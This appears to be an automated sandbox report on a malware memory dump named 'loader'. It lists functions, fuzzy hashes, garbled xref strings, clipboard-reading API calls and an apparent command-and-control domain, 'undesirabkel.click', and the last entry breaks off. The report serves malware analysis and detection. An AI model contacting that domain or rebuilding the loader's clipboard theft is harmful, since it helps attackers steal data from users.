Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: #@A{$#K_c$23$7*uu$A$`PWj$fT-@$oXh^$rHM{
API String ID: 237503144-2863353174
Opcode ID: 5e17e2abe62602a8757904d41eaf0a95546a4d3f81e28a11ee7c28afe645a10a
Instruction ID: e4786c992d32e542d8db379d6aa485053f80070514389147786cf12c71eacdc2
Opcode Fuzzy Hash: 5e17e2abe62602a8757904d41eaf0a95546a4d3f81e28a11ee7c28afe645a10a
Instruction Fuzzy Hash: 00B1C9B4A08381DFE3208F24E840B2BBBE1FB86718F44496DE5C49B391D7799855CB97

Function 0040B460 Relevance: 14.2, Strings: 11, Instructions: 467COMMON

Download Yara Rule

Strings

Fg#a, xrefs: 0040B69C
nO<I, xrefs: 0040B660
KsJ}, xrefs: 0040B6CE
;WpQ, xrefs: 0040B674
=_3Y, xrefs: 0040B688
-[Me, xrefs: 0040B692
GwAq, xrefs: 0040B6C4
i#E-, xrefs: 0040B606
#K?U, xrefs: 0040B66A
K'B!, xrefs: 0040B5FC
%FGD, xrefs: 0040B915

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID: #K?U$%FGD$-[Me$;WpQ$=_3Y$Fg#a$GwAq$K'B!$KsJ}$i#E-$nO<I
API String ID: 0-4238500352
Opcode ID: fb5543e2aa15c41415a7fdfebfffaf35fe748d06e220dbfa7f89d1a7531d8211
Instruction ID: e55833f1e46b714cf4a3a81ab42bd9f74012d8891815f5cb865316782a68d1e0
Opcode Fuzzy Hash: fb5543e2aa15c41415a7fdfebfffaf35fe748d06e220dbfa7f89d1a7531d8211
Instruction Fuzzy Hash: E61277B5200B01CFD324CF25D89179BBBF5FB46314F15892CE5AA8BAA0DB78A405CF55

Function 00428CE0 Relevance: 13.1, Strings: 10, Instructions: 601COMMON

Download Yara Rule

Strings

Q, xrefs: 004295C7
#416, xrefs: 00428D35, 00428D66
s, xrefs: 004292E9
Zcca, xrefs: 004292C1
ZU*J, xrefs: 004292D1
{x, xrefs: 004295D7
$Ca_, xrefs: 004292C9
t2u~, xrefs: 004292E1
lSXp, xrefs: 004292D9
#416, xrefs: 00428D95

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID: #416$#416$$Ca_$Q$ZU*J$Zcca$lSXp$s$t2u~${x
API String ID: 0-4098081399
Opcode ID: f0853dbc8bfbaed19b1d294f16a9334b02344e540bea85df75939c3fdc0a4e40
Instruction ID: af42baa7532fe766f1f56633af2227616e099f41a3d29df1ab95f964254dda55
Opcode Fuzzy Hash: f0853dbc8bfbaed19b1d294f16a9334b02344e540bea85df75939c3fdc0a4e40
Instruction Fuzzy Hash: 60122FB16083918BD3008F24E89136FBBE1EF86308F54486EE5D18B392D779D946CB5B

Function 00417485 Relevance: 9.6, APIs: 2, Strings: 3, Instructions: 887COMMON

Download Yara Rule

Strings

IW, xrefs: 00417B8C
*W, xrefs: 00417A24
\G, xrefs: 00417A2B

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID: *W$IW$\G
API String ID: 0-2660248714
Opcode ID: 3c42d859b7111526cdb05d3c6162599f9cc39c2b7377aa03a0e86fd2f447f3fa
Instruction ID: 642f7417fa27e0b40ab8fbe09c2ea6836aef0094a48e44abec701c1062623975
Opcode Fuzzy Hash: 3c42d859b7111526cdb05d3c6162599f9cc39c2b7377aa03a0e86fd2f447f3fa
Instruction Fuzzy Hash: 445201756047018BD728CF29C9907A3B7F2FF9A314F19856EC4968B7A1DB38E842CB54

Function 0042B8E0 Relevance: 9.3, APIs: 2, Strings: 3, Instructions: 585COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 0042B9D4
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,?,?), ref: 0042BA54

Strings

AL, xrefs: 0042BE8B
rzs6, xrefs: 0042BE73
T, xrefs: 0042BBE7

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: AL$T$rzs6
API String ID: 237503144-2592485599
Opcode ID: cfb2fc6feeef5ad3853a89cc9d1074078a1d880204b6f6556c594d460794b6e9
Instruction ID: 27d09b8c5db7d00f2b9b67fa9f1748f849549aea7697daef3686f2081c7709be
Opcode Fuzzy Hash: cfb2fc6feeef5ad3853a89cc9d1074078a1d880204b6f6556c594d460794b6e9
Instruction Fuzzy Hash: 6A1241B5608340DFE3008F25E88172BBBE1EF86314F944A7DF5D58B292D7399815CB8A

Function 00436B80 Relevance: 9.1, APIs: 6, Instructions: 135clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00436BA2
GetClipboardData.USER32 ref: 00436BC3
GlobalLock.KERNEL32 ref: 00436BE0
GlobalUnlock.KERNEL32 ref: 00436D11
CloseClipboard.USER32 ref: 00436D19

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID:
API String ID: 1006321803-0
Opcode ID: de6a2e184b00d642935acd8f7963af008746e3193ab8ef22421a4f5388a798ab
Instruction ID: 6bca6aab4f30d896cb24dae6eb02d2ab37128aba09380328214b5540e6126f4e
Opcode Fuzzy Hash: de6a2e184b00d642935acd8f7963af008746e3193ab8ef22421a4f5388a798ab
Instruction Fuzzy Hash: 1351E4B1908B439FD710AF7C994835ABFA0AB0A320F05872EE4E59B3C2D3389555C797

Function 004219E0 Relevance: 7.9, Strings: 6, Instructions: 442COMMON

Download Yara Rule

Strings

tk, xrefs: 00421D7F
=R?, xrefs: 00421AA7
9s;, xrefs: 00421A9C
j0, xrefs: 00421D87
V567, xrefs: 00421ABD
I1V3, xrefs: 00421AB2

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID: =R?$9s;$I1V3$V567$j0$tk
API String ID: 0-4200982861
Opcode ID: f64fd06c1ca5ca582b1225a6ee15225f70dd02307a993e3d9ec5122583487099
Instruction ID: 08e35681d2bc4e51bc145c6d8aeba603368bda63aa16c0b50784f37975beda80
Opcode Fuzzy Hash: f64fd06c1ca5ca582b1225a6ee15225f70dd02307a993e3d9ec5122583487099
Instruction Fuzzy Hash: 69C1E170208350CBD7248F14D8527ABB7F1FFA2354F84892DE4C68B3A1E7799909D796

Function 0040A9D4 Relevance: 7.6, Strings: 6, Instructions: 68COMMON

Download Yara Rule

Strings

g78(, xrefs: 0040A9EB
,54, xrefs: 0040A9E4
3n 8, xrefs: 0040A9DD
(3'3, xrefs: 0040A9F2
!3!#, xrefs: 0040A9F9
.(:;, xrefs: 0040AA00

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID: !3!#$(3'3$,54$.(:;$3n 8$g78(
API String ID: 0-452498207
Opcode ID: 268500fa8409c6195fac1a11468cf3caaa44d0f9eec940ebf784c03ace71b56e
Instruction ID: f75966df2058f722fd0ddce20ee0c0c37673c01f3ef8fa2472d70e4d848a68b1
Opcode Fuzzy Hash: 268500fa8409c6195fac1a11468cf3caaa44d0f9eec940ebf784c03ace71b56e
Instruction Fuzzy Hash: 37219F78A04B418BD724CF54C1A07ABBBF0AB0A314F18995DD4C367781D339A855CF99

Function 0042A860 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 530COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 0042A8FA
RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 0042A9B2

Strings

e, xrefs: 0042AABA
Ix, xrefs: 0042AAB2

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: Ix$e
API String ID: 237503144-2849821176
Opcode ID: 62b69fa2a676febb4be4764079b338fc61fb98282e7ea4bb8aad33b111f2a734
Instruction ID: 5888583b1260060b6136ccc27151d4734d54939614886abce6dbc6b04d1a935c
Opcode Fuzzy Hash: 62b69fa2a676febb4be4764079b338fc61fb98282e7ea4bb8aad33b111f2a734
Instruction Fuzzy Hash: 20F1D1756483118FE324CF59E89276BB7F1EFC5304F05882DE5858B681D778D90ACB86

Function 00417E35 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 331COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 0041818B

Strings

7, xrefs: 00418022
TW, xrefs: 0041801B
WH, xrefs: 00418014

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 7$TW$WH
API String ID: 237503144-1617174291
Opcode ID: 785ff9210cd2918ad323e254bd047c14a95bb7d4168f571d02f86e1a8b8e95ec
Instruction ID: 705b5b8f497aa9081b002cdd73fda665bd243ac863c7082e6cde8d333a76bd86
Opcode Fuzzy Hash: 785ff9210cd2918ad323e254bd047c14a95bb7d4168f571d02f86e1a8b8e95ec
Instruction Fuzzy Hash: EDB1F5726047018BC728CF28C8913A7B7F2FF95314B2A855DC09A4F7A1DB7AA843CB44

Function 004260D0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 236COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 004261CD
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0042624A

Strings

TZ, xrefs: 004260E1
2cB, xrefs: 00426324

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 2cB$TZ
API String ID: 237503144-1919056775
Opcode ID: 5157cc2f4def2222143a48eefe6ed34e63f0d6807792f6f3ee8c6a7d5808f390
Instruction ID: e79587b430c50394c843798e1132bcd84ec1aef2443012f4b04a00c8efc0345d
Opcode Fuzzy Hash: 5157cc2f4def2222143a48eefe6ed34e63f0d6807792f6f3ee8c6a7d5808f390
Instruction Fuzzy Hash: C961FEB16083509FE314CF24E88175FBBE1EBC6308F50892DF6959B281D7B59909CB97

Function 00409AD0 Relevance: 6.6, Strings: 5, Instructions: 379COMMON

Download Yara Rule

Strings

~, xrefs: 00409CEC
33CABCFF009FE8B76D75A801C764DBB8, xrefs: 00409B86
WQ, xrefs: 00409EEB
RS, xrefs: 00409EF3
iD, xrefs: 00409BED

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID: 33CABCFF009FE8B76D75A801C764DBB8$RS$~$WQ$iD
API String ID: 0-1518419822
Opcode ID: eb711044fb4b95df2a5e03d632ea7d315e3d6774f201bf15ddc31e67eeb2e478
Instruction ID: e03c5f3b130d75449e95177484df25c6313a563f3d76d1a8aed4b4e0df0fd34c
Opcode Fuzzy Hash: eb711044fb4b95df2a5e03d632ea7d315e3d6774f201bf15ddc31e67eeb2e478
Instruction Fuzzy Hash: 5BC1F0B11483408BE714DF25C8517ABBBE6EFC2308F14896DE1D59B3A2DB78C909CB56

Function 0040DE8E Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 347COMMON

Download Yara Rule

APIs

CoUninitialize.OLE32 ref: 0040DE9A

Strings

undesirabkel.click, xrefs: 0040E368
i, xrefs: 0040DEAF
iD, xrefs: 0040DF8E

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID: Uninitialize
String ID: i$undesirabkel.click$iD
API String ID: 3861434553-3024081160
Opcode ID: c036f7d96e699aabcb00218a626829bf0a1d1da531205926e6f21f2066e694fe
Instruction ID: f19f7d63c5a078be6d2d0d3354e0bce42a97a11ffa1e50c0a33dd0ba97b35c5a
Opcode Fuzzy Hash: c036f7d96e699aabcb00218a626829bf0a1d1da531205926e6f21f2066e694fe
Instruction Fuzzy Hash: 10C1F1B25093918FD331CF25C4907DBBFE1ABD6304F198D6DC8D95B392DA7909098B92

Function 00416517 Relevance: 4.9, Strings: 3, Instructions: 1124COMMON

Download Yara Rule

Strings

fVjH, xrefs: 00416FF1
]VjH, xrefs: 00416FA4
bA, xrefs: 00417286

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID: ]VjH$fVjH$bA
API String ID: 0-1296761845
Opcode ID: a1f1712f7a51080315a86d39b2709c32ca7c60a22fd6211cb91cf0fd52004c61
Instruction ID: e34bfed4883c7a2ae03370d9357e6bae0f94fff6713e2fde0d689ef759a40031
Opcode Fuzzy Hash: a1f1712f7a51080315a86d39b2709c32ca7c60a22fd6211cb91cf0fd52004c61
Instruction Fuzzy Hash: 7072CE74600601CFD7258F29C890BA3BBF2FF46314F1A869DD4968B7A2D739E885CB54

Function 0041B160 Relevance: 4.0, Strings: 3, Instructions: 286COMMON

Download Yara Rule

Strings

9HIN, xrefs: 0041B240
0D6J, xrefs: 0041B236
p@/F, xrefs: 0041B22C

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID: 0D6J$9HIN$p@/F
API String ID: 0-2960145244
Opcode ID: 22ee30c1a586ad81fea980945764170ee0bf2c45babfb792a6d0b720d4b5a302
Instruction ID: ead7b4b64be7a1b193ebe43010bc2c1d227729634ecb1b3c9feaebe2d5c64952
Opcode Fuzzy Hash: 22ee30c1a586ad81fea980945764170ee0bf2c45babfb792a6d0b720d4b5a302
Instruction Fuzzy Hash: 80A19CB5800B009FD3249F3AC942763BBF1FB45310F144A5EE8D68BB95E739A416CB96

Function 0042E4C0 Relevance: 4.0, Strings: 3, Instructions: 258COMMON

Download Yara Rule

Strings

&6, xrefs: 0042E69C
i, xrefs: 0042E567
iD, xrefs: 0042E5AC

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID: &6$i$iD
API String ID: 0-536414614
Opcode ID: 1181741ed07dc6d6f20e6a2aacd8f22b5705be23e16ac4563958b4108adce793
Instruction ID: 50db717a41da5c9c6c1b62f3b5a596a0b0433410aa2b397391c354a007127113
Opcode Fuzzy Hash: 1181741ed07dc6d6f20e6a2aacd8f22b5705be23e16ac4563958b4108adce793
Instruction Fuzzy Hash: C091CC7460D3D28BD334CF2AD4943ABBFE1AFA2314F144A5DD5D81B382D77948068B86

Function 0042F131 Relevance: 3.9, Strings: 3, Instructions: 167COMMON

Download Yara Rule

Strings

./+5, xrefs: 0042F299
5+9r, xrefs: 0042F2A4
b, xrefs: 0042F13C

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID: ./+5$5+9r$b
API String ID: 0-2648994628
Opcode ID: f25c39a04fd1f21c7c2772b0af9d7846c0d399f5fff54ad7a5638799304ddcb3
Instruction ID: 433d68f74d5527e3b342239c365b4b99fab85c4260184628ef75be6045680778
Opcode Fuzzy Hash: f25c39a04fd1f21c7c2772b0af9d7846c0d399f5fff54ad7a5638799304ddcb3
Instruction Fuzzy Hash: DE5138B55183E08BD335CF24D8653EBBBE1AFD6304F58897EC4C95B241CBB944098796

Function 004092F0 Relevance: 2.8, Strings: 2, Instructions: 286COMMON

Download Yara Rule

Strings

22, xrefs: 00409309
-, xrefs: 00409310

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID: -$22
API String ID: 0-1778336562
Opcode ID: b3bdde63751334b89d9e8f12b41d7084303f8bd16a1457219aebac341a570f30
Instruction ID: 8ce507dce49c04a3cd2a8de7f82b653d4da3a8bd69f5d819cb4600de298567fe
Opcode Fuzzy Hash: b3bdde63751334b89d9e8f12b41d7084303f8bd16a1457219aebac341a570f30
Instruction Fuzzy Hash: 3871F46110C3818AE7018F2A855077BFFE19F97344F1889AEE4D5AB3C3D779890AC766

Function 0042F0C5 Relevance: 2.7, Strings: 2, Instructions: 172COMMON

Download Yara Rule

Strings

./+5, xrefs: 0042F299
5+9r, xrefs: 0042F2A4

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID: ./+5$5+9r
API String ID: 0-1648522209
Opcode ID: f36e629989bb130e8b6a2de46d57ef67105165088fdcb407336c2c688cd08450
Instruction ID: 298096eef89628dd150bf8282f6e40ff9f19169f0975dbd5b01f7d40130c960f
Opcode Fuzzy Hash: f36e629989bb130e8b6a2de46d57ef67105165088fdcb407336c2c688cd08450
Instruction Fuzzy Hash: B051047550C3E08BD3358F24D4A63EBBBE0AF96304F68497EC4C99B341DB79440A8B96

Function 0042810F Relevance: 2.6, Strings: 2, Instructions: 69COMMON

Download Yara Rule

Strings

*a^c, xrefs: 00428886
gp`v, xrefs: 0042887E

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID: *a^c$gp`v
API String ID: 0-180863528
Opcode ID: 88474985cbe26e4a41ff8296eeb88c97fa7e2ee331d2b9b0379210720e101137
Instruction ID: 639f9d5958fe4d2cae62a4e3aa0478fdd4fc09aedcc39c21fdd68a16f1bbbd88
Opcode Fuzzy Hash: 88474985cbe26e4a41ff8296eeb88c97fa7e2ee331d2b9b0379210720e101137
Instruction Fuzzy Hash: 30115B719093A047D724AFA0A89173FB7E1EF82344FD4483EE58257382EB3C8806C74A

Function 0043E101 Relevance: 2.0, Strings: 1, Instructions: 744COMMON

Download Yara Rule

Strings

%~, xrefs: 0043E7C0

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID: %~
API String ID: 0-513252899
Opcode ID: 4069cabef761218ff9cae0cabeb2b2911641b24ff4a1c701495f3081b89f20d3
Instruction ID: 9da211b7c01cf0349fa0a1301c3944d84c38fc387fde22313fa8c7b6cbb4a4ac
Opcode Fuzzy Hash: 4069cabef761218ff9cae0cabeb2b2911641b24ff4a1c701495f3081b89f20d3
Instruction Fuzzy Hash: 96320039619320CBC7089F28D89536BB7F1EF8A314F09D87DD48587291E7799981CB8A

Function 00415C18 Relevance: 1.7, Strings: 1, Instructions: 431COMMON

Download Yara Rule

Strings

PV, xrefs: 00415E38

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID: PV
API String ID: 0-3839218938
Opcode ID: ac0133baa640ae770d0d0058fedc733bed0e63e04622889d4589ba61d3b01137
Instruction ID: d2334f4f3d398c672a27ab74ecd5a774337c4b9842708b19e8676b097c874c86
Opcode Fuzzy Hash: ac0133baa640ae770d0d0058fedc733bed0e63e04622889d4589ba61d3b01137
Instruction Fuzzy Hash: C2C12674900B01CFD7248F24D8516A3B7B1FF96324F14826EE4964F7A1E739E892CB89

Function 0043D900 Relevance: 1.7, Strings: 1, Instructions: 404COMMON

Download Yara Rule

Strings

NP,?, xrefs: 0043DB70

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID: NP,?
API String ID: 0-3110377521
Opcode ID: def64b98ee2f4f6c35ec57c0851776eca81dd081a06c43238d1108c768104af5
Instruction ID: 5175e9d9cc4d880498b314aed75692dc73dc0c872bd4de8dd3fbe6e7a2132bc7
Opcode Fuzzy Hash: def64b98ee2f4f6c35ec57c0851776eca81dd081a06c43238d1108c768104af5
Instruction Fuzzy Hash: 0DB15771E083004BD314DF24DC8173BB396AFCA324F15A62EE99A57391D778AC068799

Function 0042DC10 Relevance: 1.6, Strings: 1, Instructions: 385COMMON

Download Yara Rule

Strings

", xrefs: 0042DEF8

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 8701224f950b670283817990e08819dd9b745fc2dd2b3779b5f29f5caa7c6fbc
Instruction ID: 8f818dcdad322323d78e8cb9f14a52f1b3b46267d6fa8a621ab851d68981d317
Opcode Fuzzy Hash: 8701224f950b670283817990e08819dd9b745fc2dd2b3779b5f29f5caa7c6fbc
Instruction Fuzzy Hash: 7DC145B2F047209BD7148E25E480B6BB7E56F84350F99892FE8998B381D778DC05C7DA

Function 004274F0 Relevance: 1.6, Strings: 1, Instructions: 347COMMON

Download Yara Rule

Strings

OA, xrefs: 00427580

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID: OA
API String ID: 0-874996048
Opcode ID: 24852e1519223595083dc4adfd76ab8cc9d67a802a0d39e49249a0b02e70c50b
Instruction ID: 6b31e579dd6355cb95f08cbb31f3719de69ce3b8b7f90a8001052769dcfe9147
Opcode Fuzzy Hash: 24852e1519223595083dc4adfd76ab8cc9d67a802a0d39e49249a0b02e70c50b
Instruction Fuzzy Hash: 50C1F1356083528BC724DF28E8406ABB3F2FFD5340F95892DE4C597360E738AA15DB4A

Function 0041E700 Relevance: 1.4, Strings: 1, Instructions: 164COMMON

Download Yara Rule

Strings

q, xrefs: 0041E7D9

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID: q
API String ID: 0-4110462503
Opcode ID: d9fa2a89a57241b62bd729bb1b5c987357807bcef6bad95bad0e46aec12a5f5b
Instruction ID: 879bcb78f22c2d834b8a418542e51ee49daddb344f5e903e15afbfd2a307ad96
Opcode Fuzzy Hash: d9fa2a89a57241b62bd729bb1b5c987357807bcef6bad95bad0e46aec12a5f5b
Instruction Fuzzy Hash: 54418B35A4835157D310AB398C4279BFBD2DFD2724F18CA3DE8E45B3E1E6B948428396

Function 0041B56E Relevance: 1.4, Strings: 1, Instructions: 145COMMON

Download Yara Rule

Strings

5z2u, xrefs: 0041B621

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID: 5z2u
API String ID: 0-1925770187
Opcode ID: 134b009151fa80ec4ce095f2bf24bdd8b6d8312e640b0f3f5b2ada5b35ece035
Instruction ID: 36ed13f7002c1a1149fe56bd8065502e52bdfbc34c3e8d91b2cbdebcc770733f
Opcode Fuzzy Hash: 134b009151fa80ec4ce095f2bf24bdd8b6d8312e640b0f3f5b2ada5b35ece035
Instruction Fuzzy Hash: 313104351043808FE725CF3998906A37BE2EB57308F2C85AED4D28B352D739A847D759

Function 004308B5 Relevance: 1.3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

Strings

0, xrefs: 004308C0

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
